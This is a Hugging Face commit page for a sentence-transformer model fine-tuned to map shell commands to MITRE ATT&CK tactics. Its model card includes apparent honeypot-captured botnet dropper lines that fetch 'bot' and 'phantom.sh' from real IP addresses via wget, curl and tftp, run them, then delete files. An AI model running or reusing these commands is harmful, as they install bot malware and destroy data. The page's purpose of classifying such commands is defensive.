cebollet commited on
Commit
59fa5ae
·
verified ·
1 Parent(s): c43b0ce

Add new SentenceTransformer model

Browse files
1_Pooling/config.json ADDED
@@ -0,0 +1,10 @@
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "word_embedding_dimension": 768,
3
+ "pooling_mode_cls_token": false,
4
+ "pooling_mode_mean_tokens": true,
5
+ "pooling_mode_max_tokens": false,
6
+ "pooling_mode_mean_sqrt_len_tokens": false,
7
+ "pooling_mode_weightedmean_tokens": false,
8
+ "pooling_mode_lasttoken": false,
9
+ "include_prompt": true
10
+ }
README.md ADDED
@@ -0,0 +1,477 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ tags:
3
+ - sentence-transformers
4
+ - sentence-similarity
5
+ - feature-extraction
6
+ - generated_from_trainer
7
+ - dataset_size:212
8
+ - loss:CosineSimilarityLoss
9
+ base_model: sentence-transformers/all-mpnet-base-v2
10
+ widget:
11
+ - source_sentence: sh; enable; system; shell; /bin/busybox
12
+ sentences:
13
+ - 'Defense Evasion: The adversary is trying to avoid being detected.
14
+
15
+
16
+ Defense Evasion consists of techniques that adversaries use to avoid detection
17
+ throughout their compromise. Techniques used for defense evasion include uninstalling/disabling
18
+ security software or obfuscating/encrypting data and scripts. Adversaries also
19
+ leverage and abuse trusted processes to hide and masquerade their malware. Other
20
+ tactics’ techniques are cross-listed here when those techniques include the added
21
+ benefit of subverting defenses. '
22
+ - 'Defense Evasion: The adversary is trying to avoid being detected.
23
+
24
+
25
+ Defense Evasion consists of techniques that adversaries use to avoid detection
26
+ throughout their compromise. Techniques used for defense evasion include uninstalling/disabling
27
+ security software or obfuscating/encrypting data and scripts. Adversaries also
28
+ leverage and abuse trusted processes to hide and masquerade their malware. Other
29
+ tactics’ techniques are cross-listed here when those techniques include the added
30
+ benefit of subverting defenses. '
31
+ - 'Lateral Movement: The adversary is trying to move through your environment.
32
+
33
+
34
+ Lateral Movement consists of techniques that adversaries use to enter and control
35
+ remote systems on a network. Following through on their primary objective often
36
+ requires exploring the network to find their target and subsequently gaining access
37
+ to it. Reaching their objective often involves pivoting through multiple systems
38
+ and accounts to gain. Adversaries might install their own remote access tools
39
+ to accomplish Lateral Movement or use legitimate credentials with native network
40
+ and operating system tools, which may be stealthier. '
41
+ - source_sentence: enable; ; system; ; shell; ; SH; ; /bin/busybox
42
+ sentences:
43
+ - 'Persistence: The adversary is trying to maintain their foothold.
44
+
45
+
46
+ Persistence consists of techniques that adversaries use to keep access to systems
47
+ across restarts, changed credentials, and other interruptions that could cut off
48
+ their access. Techniques used for persistence include any access, action, or configuration
49
+ changes that let them maintain their foothold on systems, such as replacing or
50
+ hijacking legitimate code or adding startup code. '
51
+ - "Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\
52
+ \nPrivilege Escalation consists of techniques that adversaries use to gain higher-level\
53
+ \ permissions on a system or network. Adversaries can often enter and explore\
54
+ \ a network with unprivileged access but require elevated permissions to follow\
55
+ \ through on their objectives. Common approaches are to take advantage of system\
56
+ \ weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access\
57
+ \ include: \n\n* SYSTEM/root level\n* local administrator\n* user account with\
58
+ \ admin-like access \n* user accounts with access to specific system or perform\
59
+ \ specific function\n\nThese techniques often overlap with Persistence techniques,\
60
+ \ as OS features that let an adversary persist can execute in an elevated context.\
61
+ \ "
62
+ - 'Defense Evasion: The adversary is trying to avoid being detected.
63
+
64
+
65
+ Defense Evasion consists of techniques that adversaries use to avoid detection
66
+ throughout their compromise. Techniques used for defense evasion include uninstalling/disabling
67
+ security software or obfuscating/encrypting data and scripts. Adversaries also
68
+ leverage and abuse trusted processes to hide and masquerade their malware. Other
69
+ tactics’ techniques are cross-listed here when those techniques include the added
70
+ benefit of subverting defenses. '
71
+ - source_sentence: zlxx; enable; ; system; ; shell; ; sh; ; /bin/busybox
72
+ sentences:
73
+ - 'Defense Evasion: The adversary is trying to avoid being detected.
74
+
75
+
76
+ Defense Evasion consists of techniques that adversaries use to avoid detection
77
+ throughout their compromise. Techniques used for defense evasion include uninstalling/disabling
78
+ security software or obfuscating/encrypting data and scripts. Adversaries also
79
+ leverage and abuse trusted processes to hide and masquerade their malware. Other
80
+ tactics’ techniques are cross-listed here when those techniques include the added
81
+ benefit of subverting defenses. '
82
+ - 'Execution: The adversary is trying to run malicious code.
83
+
84
+
85
+ Execution consists of techniques that result in adversary-controlled code running
86
+ on a local or remote system. Techniques that run malicious code are often paired
87
+ with techniques from all other tactics to achieve broader goals, like exploring
88
+ a network or stealing data. For example, an adversary might use a remote access
89
+ tool to run a PowerShell script that does Remote System Discovery. '
90
+ - 'Persistence: The adversary is trying to maintain their foothold.
91
+
92
+
93
+ Persistence consists of techniques that adversaries use to keep access to systems
94
+ across restarts, changed credentials, and other interruptions that could cut off
95
+ their access. Techniques used for persistence include any access, action, or configuration
96
+ changes that let them maintain their foothold on systems, such as replacing or
97
+ hijacking legitimate code or adding startup code. '
98
+ - source_sentence: cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://89.110.99.68/bot;
99
+ chmod 777 *; ./bot; cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://89.110.99.68/bot;
100
+ chmod 777 *; ./bot
101
+ sentences:
102
+ - 'Resource Development: The adversary is trying to establish resources they can
103
+ use to support operations.
104
+
105
+
106
+ Resource Development consists of techniques that involve adversaries creating,
107
+ purchasing, or compromising/stealing resources that can be used to support targeting.
108
+ Such resources include infrastructure, accounts, or capabilities. These resources
109
+ can be leveraged by the adversary to aid in other phases of the adversary lifecycle,
110
+ such as using purchased domains to support Command and Control, email accounts
111
+ for phishing as a part of Initial Access, or stealing code signing certificates
112
+ to help with Defense Evasion.'
113
+ - "Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\
114
+ \nPrivilege Escalation consists of techniques that adversaries use to gain higher-level\
115
+ \ permissions on a system or network. Adversaries can often enter and explore\
116
+ \ a network with unprivileged access but require elevated permissions to follow\
117
+ \ through on their objectives. Common approaches are to take advantage of system\
118
+ \ weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access\
119
+ \ include: \n\n* SYSTEM/root level\n* local administrator\n* user account with\
120
+ \ admin-like access \n* user accounts with access to specific system or perform\
121
+ \ specific function\n\nThese techniques often overlap with Persistence techniques,\
122
+ \ as OS features that let an adversary persist can execute in an elevated context.\
123
+ \ "
124
+ - 'Execution: The adversary is trying to run malicious code.
125
+
126
+
127
+ Execution consists of techniques that result in adversary-controlled code running
128
+ on a local or remote system. Techniques that run malicious code are often paired
129
+ with techniques from all other tactics to achieve broader goals, like exploring
130
+ a network or stealing data. For example, an adversary might use a remote access
131
+ tool to run a PowerShell script that does Remote System Discovery. '
132
+ - source_sentence: cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh;
133
+ chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod
134
+ 777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh
135
+ phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp
136
+ 74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget
137
+ -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh
138
+ sentences:
139
+ - 'Reconnaissance: The adversary is trying to gather information they can use to
140
+ plan future operations.
141
+
142
+
143
+ Reconnaissance consists of techniques that involve adversaries actively or passively
144
+ gathering information that can be used to support targeting. Such information
145
+ may include details of the victim organization, infrastructure, or staff/personnel.
146
+ This information can be leveraged by the adversary to aid in other phases of the
147
+ adversary lifecycle, such as using gathered information to plan and execute Initial
148
+ Access, to scope and prioritize post-compromise objectives, or to drive and lead
149
+ further Reconnaissance efforts.'
150
+ - 'Reconnaissance: The adversary is trying to gather information they can use to
151
+ plan future operations.
152
+
153
+
154
+ Reconnaissance consists of techniques that involve adversaries actively or passively
155
+ gathering information that can be used to support targeting. Such information
156
+ may include details of the victim organization, infrastructure, or staff/personnel.
157
+ This information can be leveraged by the adversary to aid in other phases of the
158
+ adversary lifecycle, such as using gathered information to plan and execute Initial
159
+ Access, to scope and prioritize post-compromise objectives, or to drive and lead
160
+ further Reconnaissance efforts.'
161
+ - "Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\
162
+ \nPrivilege Escalation consists of techniques that adversaries use to gain higher-level\
163
+ \ permissions on a system or network. Adversaries can often enter and explore\
164
+ \ a network with unprivileged access but require elevated permissions to follow\
165
+ \ through on their objectives. Common approaches are to take advantage of system\
166
+ \ weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access\
167
+ \ include: \n\n* SYSTEM/root level\n* local administrator\n* user account with\
168
+ \ admin-like access \n* user accounts with access to specific system or perform\
169
+ \ specific function\n\nThese techniques often overlap with Persistence techniques,\
170
+ \ as OS features that let an adversary persist can execute in an elevated context.\
171
+ \ "
172
+ pipeline_tag: sentence-similarity
173
+ library_name: sentence-transformers
174
+ ---
175
+
176
+ # SentenceTransformer based on sentence-transformers/all-mpnet-base-v2
177
+
178
+ This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [sentence-transformers/all-mpnet-base-v2](https://huggingface.co/sentence-transformers/all-mpnet-base-v2). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
179
+
180
+ ## Model Details
181
+
182
+ ### Model Description
183
+ - **Model Type:** Sentence Transformer
184
+ - **Base model:** [sentence-transformers/all-mpnet-base-v2](https://huggingface.co/sentence-transformers/all-mpnet-base-v2) <!-- at revision 12e86a3c702fc3c50205a8db88f0ec7c0b6b94a0 -->
185
+ - **Maximum Sequence Length:** 384 tokens
186
+ - **Output Dimensionality:** 768 dimensions
187
+ - **Similarity Function:** Cosine Similarity
188
+ <!-- - **Training Dataset:** Unknown -->
189
+ <!-- - **Language:** Unknown -->
190
+ <!-- - **License:** Unknown -->
191
+
192
+ ### Model Sources
193
+
194
+ - **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
195
+ - **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
196
+ - **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
197
+
198
+ ### Full Model Architecture
199
+
200
+ ```
201
+ SentenceTransformer(
202
+ (0): Transformer({'max_seq_length': 384, 'do_lower_case': False}) with Transformer model: MPNetModel
203
+ (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
204
+ (2): Normalize()
205
+ )
206
+ ```
207
+
208
+ ## Usage
209
+
210
+ ### Direct Usage (Sentence Transformers)
211
+
212
+ First install the Sentence Transformers library:
213
+
214
+ ```bash
215
+ pip install -U sentence-transformers
216
+ ```
217
+
218
+ Then you can load this model and run inference.
219
+ ```python
220
+ from sentence_transformers import SentenceTransformer
221
+
222
+ # Download from the 🤗 Hub
223
+ model = SentenceTransformer("cebollet/fine-tuned-mitre-model")
224
+ # Run inference
225
+ sentences = [
226
+ 'cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp 74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh',
227
+ 'Reconnaissance: The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.',
228
+ 'Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. ',
229
+ ]
230
+ embeddings = model.encode(sentences)
231
+ print(embeddings.shape)
232
+ # [3, 768]
233
+
234
+ # Get the similarity scores for the embeddings
235
+ similarities = model.similarity(embeddings, embeddings)
236
+ print(similarities.shape)
237
+ # [3, 3]
238
+ ```
239
+
240
+ <!--
241
+ ### Direct Usage (Transformers)
242
+
243
+ <details><summary>Click to see the direct usage in Transformers</summary>
244
+
245
+ </details>
246
+ -->
247
+
248
+ <!--
249
+ ### Downstream Usage (Sentence Transformers)
250
+
251
+ You can finetune this model on your own dataset.
252
+
253
+ <details><summary>Click to expand</summary>
254
+
255
+ </details>
256
+ -->
257
+
258
+ <!--
259
+ ### Out-of-Scope Use
260
+
261
+ *List how the model may foreseeably be misused and address what users ought not to do with the model.*
262
+ -->
263
+
264
+ <!--
265
+ ## Bias, Risks and Limitations
266
+
267
+ *What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
268
+ -->
269
+
270
+ <!--
271
+ ### Recommendations
272
+
273
+ *What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
274
+ -->
275
+
276
+ ## Training Details
277
+
278
+ ### Training Dataset
279
+
280
+ #### Unnamed Dataset
281
+
282
+ * Size: 212 training samples
283
+ * Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
284
+ * Approximate statistics based on the first 212 samples:
285
+ | | sentence_0 | sentence_1 | label |
286
+ |:--------|:----------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:--------------------------------------------------------------|
287
+ | type | string | string | float |
288
+ | details | <ul><li>min: 4 tokens</li><li>mean: 65.7 tokens</li><li>max: 384 tokens</li></ul> | <ul><li>min: 82 tokens</li><li>mean: 103.74 tokens</li><li>max: 153 tokens</li></ul> | <ul><li>min: 0.0</li><li>mean: 0.5</li><li>max: 1.0</li></ul> |
289
+ * Samples:
290
+ | sentence_0 | sentence_1 | label |
291
+ |:---------------------------------------------------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:-----------------|
292
+ | <code>sh; enable; klv1234; system; shell; echo "string" </code> | <code>Initial Access: The adversary is trying to get into your network.<br><br>Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.</code> | <code>0.0</code> |
293
+ | <code>sh; ping; sh; enable; system; shell; linuxshell; /bin/busybox</code> | <code>Lateral Movement: The adversary is trying to move through your environment.<br><br>Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. </code> | <code>0.0</code> |
294
+ | <code>enable; ; linuxshell; ; system; ; sh; ; /bin/busybox</code> | <code>Privilege Escalation: The adversary is trying to gain higher-level permissions.<br><br>Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: <br><br>* SYSTEM/root level<br>* local administrator<br>* user account with admin-like access <br>* user accounts with access to specific system or perform specific function<br><br>These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. </code> | <code>1.0</code> |
295
+ * Loss: [<code>CosineSimilarityLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cosinesimilarityloss) with these parameters:
296
+ ```json
297
+ {
298
+ "loss_fct": "torch.nn.modules.loss.MSELoss"
299
+ }
300
+ ```
301
+
302
+ ### Training Hyperparameters
303
+ #### Non-Default Hyperparameters
304
+
305
+ - `per_device_train_batch_size`: 4
306
+ - `per_device_eval_batch_size`: 4
307
+ - `num_train_epochs`: 10
308
+ - `multi_dataset_batch_sampler`: round_robin
309
+
310
+ #### All Hyperparameters
311
+ <details><summary>Click to expand</summary>
312
+
313
+ - `overwrite_output_dir`: False
314
+ - `do_predict`: False
315
+ - `eval_strategy`: no
316
+ - `prediction_loss_only`: True
317
+ - `per_device_train_batch_size`: 4
318
+ - `per_device_eval_batch_size`: 4
319
+ - `per_gpu_train_batch_size`: None
320
+ - `per_gpu_eval_batch_size`: None
321
+ - `gradient_accumulation_steps`: 1
322
+ - `eval_accumulation_steps`: None
323
+ - `torch_empty_cache_steps`: None
324
+ - `learning_rate`: 5e-05
325
+ - `weight_decay`: 0.0
326
+ - `adam_beta1`: 0.9
327
+ - `adam_beta2`: 0.999
328
+ - `adam_epsilon`: 1e-08
329
+ - `max_grad_norm`: 1
330
+ - `num_train_epochs`: 10
331
+ - `max_steps`: -1
332
+ - `lr_scheduler_type`: linear
333
+ - `lr_scheduler_kwargs`: {}
334
+ - `warmup_ratio`: 0.0
335
+ - `warmup_steps`: 0
336
+ - `log_level`: passive
337
+ - `log_level_replica`: warning
338
+ - `log_on_each_node`: True
339
+ - `logging_nan_inf_filter`: True
340
+ - `save_safetensors`: True
341
+ - `save_on_each_node`: False
342
+ - `save_only_model`: False
343
+ - `restore_callback_states_from_checkpoint`: False
344
+ - `no_cuda`: False
345
+ - `use_cpu`: False
346
+ - `use_mps_device`: False
347
+ - `seed`: 42
348
+ - `data_seed`: None
349
+ - `jit_mode_eval`: False
350
+ - `use_ipex`: False
351
+ - `bf16`: False
352
+ - `fp16`: False
353
+ - `fp16_opt_level`: O1
354
+ - `half_precision_backend`: auto
355
+ - `bf16_full_eval`: False
356
+ - `fp16_full_eval`: False
357
+ - `tf32`: None
358
+ - `local_rank`: 0
359
+ - `ddp_backend`: None
360
+ - `tpu_num_cores`: None
361
+ - `tpu_metrics_debug`: False
362
+ - `debug`: []
363
+ - `dataloader_drop_last`: False
364
+ - `dataloader_num_workers`: 0
365
+ - `dataloader_prefetch_factor`: None
366
+ - `past_index`: -1
367
+ - `disable_tqdm`: False
368
+ - `remove_unused_columns`: True
369
+ - `label_names`: None
370
+ - `load_best_model_at_end`: False
371
+ - `ignore_data_skip`: False
372
+ - `fsdp`: []
373
+ - `fsdp_min_num_params`: 0
374
+ - `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
375
+ - `fsdp_transformer_layer_cls_to_wrap`: None
376
+ - `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
377
+ - `deepspeed`: None
378
+ - `label_smoothing_factor`: 0.0
379
+ - `optim`: adamw_torch
380
+ - `optim_args`: None
381
+ - `adafactor`: False
382
+ - `group_by_length`: False
383
+ - `length_column_name`: length
384
+ - `ddp_find_unused_parameters`: None
385
+ - `ddp_bucket_cap_mb`: None
386
+ - `ddp_broadcast_buffers`: False
387
+ - `dataloader_pin_memory`: True
388
+ - `dataloader_persistent_workers`: False
389
+ - `skip_memory_metrics`: True
390
+ - `use_legacy_prediction_loop`: False
391
+ - `push_to_hub`: False
392
+ - `resume_from_checkpoint`: None
393
+ - `hub_model_id`: None
394
+ - `hub_strategy`: every_save
395
+ - `hub_private_repo`: None
396
+ - `hub_always_push`: False
397
+ - `gradient_checkpointing`: False
398
+ - `gradient_checkpointing_kwargs`: None
399
+ - `include_inputs_for_metrics`: False
400
+ - `include_for_metrics`: []
401
+ - `eval_do_concat_batches`: True
402
+ - `fp16_backend`: auto
403
+ - `push_to_hub_model_id`: None
404
+ - `push_to_hub_organization`: None
405
+ - `mp_parameters`:
406
+ - `auto_find_batch_size`: False
407
+ - `full_determinism`: False
408
+ - `torchdynamo`: None
409
+ - `ray_scope`: last
410
+ - `ddp_timeout`: 1800
411
+ - `torch_compile`: False
412
+ - `torch_compile_backend`: None
413
+ - `torch_compile_mode`: None
414
+ - `include_tokens_per_second`: False
415
+ - `include_num_input_tokens_seen`: False
416
+ - `neftune_noise_alpha`: None
417
+ - `optim_target_modules`: None
418
+ - `batch_eval_metrics`: False
419
+ - `eval_on_start`: False
420
+ - `use_liger_kernel`: False
421
+ - `eval_use_gather_object`: False
422
+ - `average_tokens_across_devices`: False
423
+ - `prompts`: None
424
+ - `batch_sampler`: batch_sampler
425
+ - `multi_dataset_batch_sampler`: round_robin
426
+
427
+ </details>
428
+
429
+ ### Training Logs
430
+ | Epoch | Step | Training Loss |
431
+ |:------:|:----:|:-------------:|
432
+ | 9.4340 | 500 | 0.0526 |
433
+
434
+
435
+ ### Framework Versions
436
+ - Python: 3.11.13
437
+ - Sentence Transformers: 4.1.0
438
+ - Transformers: 4.52.4
439
+ - PyTorch: 2.6.0+cu124
440
+ - Accelerate: 1.7.0
441
+ - Datasets: 2.14.4
442
+ - Tokenizers: 0.21.1
443
+
444
+ ## Citation
445
+
446
+ ### BibTeX
447
+
448
+ #### Sentence Transformers
449
+ ```bibtex
450
+ @inproceedings{reimers-2019-sentence-bert,
451
+ title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
452
+ author = "Reimers, Nils and Gurevych, Iryna",
453
+ booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
454
+ month = "11",
455
+ year = "2019",
456
+ publisher = "Association for Computational Linguistics",
457
+ url = "https://arxiv.org/abs/1908.10084",
458
+ }
459
+ ```
460
+
461
+ <!--
462
+ ## Glossary
463
+
464
+ *Clearly define terms in order to be accessible across audiences.*
465
+ -->
466
+
467
+ <!--
468
+ ## Model Card Authors
469
+
470
+ *Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
471
+ -->
472
+
473
+ <!--
474
+ ## Model Card Contact
475
+
476
+ *Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
477
+ -->
config.json ADDED
@@ -0,0 +1,23 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "architectures": [
3
+ "MPNetModel"
4
+ ],
5
+ "attention_probs_dropout_prob": 0.1,
6
+ "bos_token_id": 0,
7
+ "eos_token_id": 2,
8
+ "hidden_act": "gelu",
9
+ "hidden_dropout_prob": 0.1,
10
+ "hidden_size": 768,
11
+ "initializer_range": 0.02,
12
+ "intermediate_size": 3072,
13
+ "layer_norm_eps": 1e-05,
14
+ "max_position_embeddings": 514,
15
+ "model_type": "mpnet",
16
+ "num_attention_heads": 12,
17
+ "num_hidden_layers": 12,
18
+ "pad_token_id": 1,
19
+ "relative_attention_num_buckets": 32,
20
+ "torch_dtype": "float32",
21
+ "transformers_version": "4.52.4",
22
+ "vocab_size": 30527
23
+ }
config_sentence_transformers.json ADDED
@@ -0,0 +1,10 @@
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "__version__": {
3
+ "sentence_transformers": "4.1.0",
4
+ "transformers": "4.52.4",
5
+ "pytorch": "2.6.0+cu124"
6
+ },
7
+ "prompts": {},
8
+ "default_prompt_name": null,
9
+ "similarity_fn_name": "cosine"
10
+ }
model.safetensors ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:96d563065765fde808d589bd5352b9ea957e68f98be729839538ed9462f5cc38
3
+ size 437967672
modules.json ADDED
@@ -0,0 +1,20 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [
2
+ {
3
+ "idx": 0,
4
+ "name": "0",
5
+ "path": "",
6
+ "type": "sentence_transformers.models.Transformer"
7
+ },
8
+ {
9
+ "idx": 1,
10
+ "name": "1",
11
+ "path": "1_Pooling",
12
+ "type": "sentence_transformers.models.Pooling"
13
+ },
14
+ {
15
+ "idx": 2,
16
+ "name": "2",
17
+ "path": "2_Normalize",
18
+ "type": "sentence_transformers.models.Normalize"
19
+ }
20
+ ]
sentence_bert_config.json ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
+ {
2
+ "max_seq_length": 384,
3
+ "do_lower_case": false
4
+ }
special_tokens_map.json ADDED
@@ -0,0 +1,51 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "bos_token": {
3
+ "content": "<s>",
4
+ "lstrip": false,
5
+ "normalized": false,
6
+ "rstrip": false,
7
+ "single_word": false
8
+ },
9
+ "cls_token": {
10
+ "content": "<s>",
11
+ "lstrip": false,
12
+ "normalized": false,
13
+ "rstrip": false,
14
+ "single_word": false
15
+ },
16
+ "eos_token": {
17
+ "content": "</s>",
18
+ "lstrip": false,
19
+ "normalized": false,
20
+ "rstrip": false,
21
+ "single_word": false
22
+ },
23
+ "mask_token": {
24
+ "content": "<mask>",
25
+ "lstrip": true,
26
+ "normalized": false,
27
+ "rstrip": false,
28
+ "single_word": false
29
+ },
30
+ "pad_token": {
31
+ "content": "<pad>",
32
+ "lstrip": false,
33
+ "normalized": false,
34
+ "rstrip": false,
35
+ "single_word": false
36
+ },
37
+ "sep_token": {
38
+ "content": "</s>",
39
+ "lstrip": false,
40
+ "normalized": false,
41
+ "rstrip": false,
42
+ "single_word": false
43
+ },
44
+ "unk_token": {
45
+ "content": "[UNK]",
46
+ "lstrip": false,
47
+ "normalized": false,
48
+ "rstrip": false,
49
+ "single_word": false
50
+ }
51
+ }
tokenizer.json ADDED
The diff for this file is too large to render. See raw diff
 
tokenizer_config.json ADDED
@@ -0,0 +1,73 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "added_tokens_decoder": {
3
+ "0": {
4
+ "content": "<s>",
5
+ "lstrip": false,
6
+ "normalized": false,
7
+ "rstrip": false,
8
+ "single_word": false,
9
+ "special": true
10
+ },
11
+ "1": {
12
+ "content": "<pad>",
13
+ "lstrip": false,
14
+ "normalized": false,
15
+ "rstrip": false,
16
+ "single_word": false,
17
+ "special": true
18
+ },
19
+ "2": {
20
+ "content": "</s>",
21
+ "lstrip": false,
22
+ "normalized": false,
23
+ "rstrip": false,
24
+ "single_word": false,
25
+ "special": true
26
+ },
27
+ "3": {
28
+ "content": "<unk>",
29
+ "lstrip": false,
30
+ "normalized": true,
31
+ "rstrip": false,
32
+ "single_word": false,
33
+ "special": true
34
+ },
35
+ "104": {
36
+ "content": "[UNK]",
37
+ "lstrip": false,
38
+ "normalized": false,
39
+ "rstrip": false,
40
+ "single_word": false,
41
+ "special": true
42
+ },
43
+ "30526": {
44
+ "content": "<mask>",
45
+ "lstrip": true,
46
